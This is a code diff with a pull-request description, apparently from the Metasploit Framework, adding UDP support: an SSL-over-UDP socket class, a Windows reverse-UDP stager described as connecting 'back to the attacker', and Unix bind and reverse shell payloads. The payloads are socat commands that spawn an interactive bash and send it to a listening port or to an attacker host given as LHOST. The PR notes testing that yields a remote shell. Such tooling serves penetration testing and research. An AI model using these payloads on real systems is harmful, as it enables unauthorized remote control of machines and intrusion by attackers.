+  def read(length = nil, opts = {})
+    if not allow_nonblock?
+      length = 16384 unless length
+      begin
+        return sslsock.sysread(length)
+      rescue ::IOError, ::Errno::EPIPE, ::OpenSSL::SSL::SSLError
+        return nil
+      end
+      return
+    end
+
+
+    begin
+      while true
+        s = Rex::ThreadSafe.select( [ self.sslsock ], nil, nil, 0.10 )
+        if( s == nil || s[0] == nil )
+          next
+        end
+        return sslsock.read_nonblock( length )
+      end
+
+    rescue ::IOError, ::Errno::EPIPE
+      return nil
+
+    # Ruby 1.8.7 and 1.9.0/1.9.1 uses a standard Errno
+    rescue ::Errno::EAGAIN, ::Errno::EWOULDBLOCK
+      # Sleep for a tenth a second, or until we can read again
+      Rex::ThreadSafe.select( [ self.sslsock ], nil, nil, 0.10 )
+      # Decrement the block size to handle full sendQs better
+      block_size = 1024
+      # Try to write the data again
+      retry
+
+    # Ruby 1.9.2+ uses IO::WaitReadable/IO::WaitWritable
+    rescue ::Exception => e
+      if ::IO.const_defined?('WaitReadable') and e.kind_of?(::IO::WaitReadable)
+        IO::select( [ self.sslsock ], nil, nil, 0.5 )
+        retry
+      end
+
+      if ::IO.const_defined?('WaitWritable') and e.kind_of?(::IO::WaitWritable)
+        IO::select( nil, [ self.sslsock ], nil, 0.5 )
+        retry
+      end
+
+      # Another form of SSL error, this is always fatal
+      if e.kind_of?(::OpenSSL::SSL::SSLError)
+        return nil
+      end
+
+      raise e
+    end
+
+  end
+
+
+  #
+  # Closes the SSL socket.
+  #
+  def close
+    sslsock.close rescue nil
+    super
+  end
+
+  #
+  # Ignore shutdown requests
+  #
+  def shutdown(how=0)
+    # Calling shutdown() on an SSL socket can lead to bad things
+    # Cause of http://metasploit.com/dev/trac/ticket/102
+  end
+
+  #
+  # Access to peer cert
+  #
+  def peer_cert
+    sslsock.peer_cert if sslsock
+  end
+
+  #
+  # Access to peer cert chain
+  #
+  def peer_cert_chain
+    sslsock.peer_cert_chain if sslsock
+  end
+
+  #
+  # Access to the current cipher
+  #
+  def cipher
+    sslsock.cipher if sslsock
+  end
+
+  #
+  # Prevent a sysread from the bare socket
+  #
+  def sysread(*args)
+    raise RuntimeError, "Invalid sysread() call on SSL socket"
+  end
+
+  #
+  # Prevent a sysread from the bare socket
+  #
+  def syswrite(*args)
+    raise RuntimeError, "Invalid syswrite() call on SSL socket"
+  end
+
+  #
+  # This flag determines whether to use the non-blocking openssl
+  # API calls when they are available. This is still buggy on
+  # Linux/Mac OS X, but is required on Windows
+  #
+  def allow_nonblock?
+    avail = self.sslsock.respond_to?(:accept_nonblock)
+    if avail and Rex::Compat.is_windows
+      return true
+    end
+    false
+  end
+
+  attr_reader :peer_verified # :nodoc:
+  attr_reader :ssl_negotiated_version # :nodoc:
+  attr_accessor :sslsock, :sslctx, :sslhash # :nodoc:
+
+  def type?
+    return 'udp-ssl'
+  end
+
+protected
+
+  attr_writer :peer_verified # :nodoc:
+  attr_writer :ssl_negotiated_version # :nodoc:
+
+
+rescue LoadError
+end
+
+end
+

--- a/lib/rex/socket/tcp.rb
+++ b/lib/rex/socket/tcp.rb
@@ -53,24 +53,6 @@ module Rex::Socket::Tcp
     end
   end
 
-  #
-  # Returns peer information (host + port) in host:port format.
-  #
-  def peerinfo
-    if (pi = getpeername)
-      return pi[1] + ':' + pi[2].to_s
-    end
-  end
-
-  #
-  # Returns local information (host + port) in host:port format.
-  #
-  def localinfo
-    if (pi = getlocalname)
-      return pi[1] + ':' + pi[2].to_s
-    end
-  end
-
   # returns socket type
   def type?
     return 'tcp'

--- a/modules/payloads/singles/cmd/unix/bind_socat_udp.rb
+++ b/modules/payloads/singles/cmd/unix/bind_socat_udp.rb
@@ -1,0 +1,52 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_udp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  CachedSize = 35
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Unix Command Shell, Bind UDP (via socat)',
+      'Description'   => 'Creates an interactive shell via socat',
+      'Author'        => 'RageLtMan',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'unix',
+      'Arch'          => ARCH_CMD,
+      'Handler'       => Msf::Handler::BindUdp,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'cmd',
+      'RequiredCmd'   => 'socat',
+      'Payload'       =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    return super + command_string
+  end
+
+  #
+  # Returns the command string to use for execution
+  #
+  def command_string
+    "socat udp-listen:#{datastore['LPORT']} exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &"
+  end
+
+end

--- a/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb
@@ -1,0 +1,52 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_udp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  CachedSize = 35
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Unix Command Shell, Reverse UDP (via socat)',
+      'Description'   => 'Creates an interactive shell via socat',
+      'Author'        => 'RageLtMan',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'unix',
+      'Arch'          => ARCH_CMD,
+      'Handler'       => Msf::Handler::ReverseUdp,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'cmd',
+      'RequiredCmd'   => 'socat',
+      'Payload'       =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    return super + command_string
+  end
+
+  #
+  # Returns the command string to use for execution
+  #
+  def command_string
+    "socat udp-connect:#{datastore['LHOST']}:#{datastore['LPORT']} exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &"
+  end
+
+end

--- a/modules/payloads/stagers/windows/reverse_udp.rb
+++ b/modules/payloads/stagers/windows/reverse_udp.rb
@@ -1,0 +1,44 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/reverse_udp'
+require 'msf/core/payload/windows/reverse_udp'
+
+module Metasploit4
+
+  CachedSize = 314
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Windows::ReverseUdp
+
+  def self.handler_type_alias
+    'reverse_udp'
+  end
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Reverse UDP Stager with UUID Support',
+      'Description' => 'Connect back to the attacker with UUID Support',
+      'Author'      => [ 'RageLtMan' ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86,
+      'Handler'     => Msf::Handler::ReverseUdp,
+      'Convention'  => 'sockedi',
+      'Stager'      => { 'RequiresMidstager' => false }
+    ))
+  end
+
+  #
+  # Override the uuid function and opt-in for sending the
+  # UUID in the stage.
+  #
+  def include_send_uuid
+    false
+  end
+
+end


### PR DESCRIPTION
Add reverse_udp stager and session handler

Copy asm_reverse_tcp to create a UDP socket for connect-back. Add
an initial socket write from the payload to prod the handler into
action. Use newline if UUID is not being sent.

Create a RingBufferUdp descendant of RingBuffer using a new
monitor_thread method which accounts for the UDPsocket.

Update Interactive session to use the UDP ring buffer as needed.

Create handler for reverse_udp. Since there's no client created
when a UDP socket "connects," mock up a client object from the
incoming sockaddr structure and pass that into the session.
Create transport options for reverse_udp.

Move peerinfo and localinfo convenience methods into socket.rb
from their original place in tcp.

Disable default use of IPv6 for UDP sockets.

Testing:
  Windows payload - connects back, but wont accept input from
MSF properly since the handles for STDOUT, STDERR, and STDIN are
all tied to the stateless socket at EDI - payload needs work.
  Netcat -u and MSF's own connect -u work just fine and in the
case of nc provide useful remote sessions over UDP - we have shell.
Notes:
  This provides a usable handler for incoming UDP sessions which
can originate from NC or any source capable of abstracting its
side of the stateless socket in  reasonable manner.
  This also provides the basis for implementing meterpreter over
DTLS, as well as DNS, RTP, and other tunneled transports over UDP.
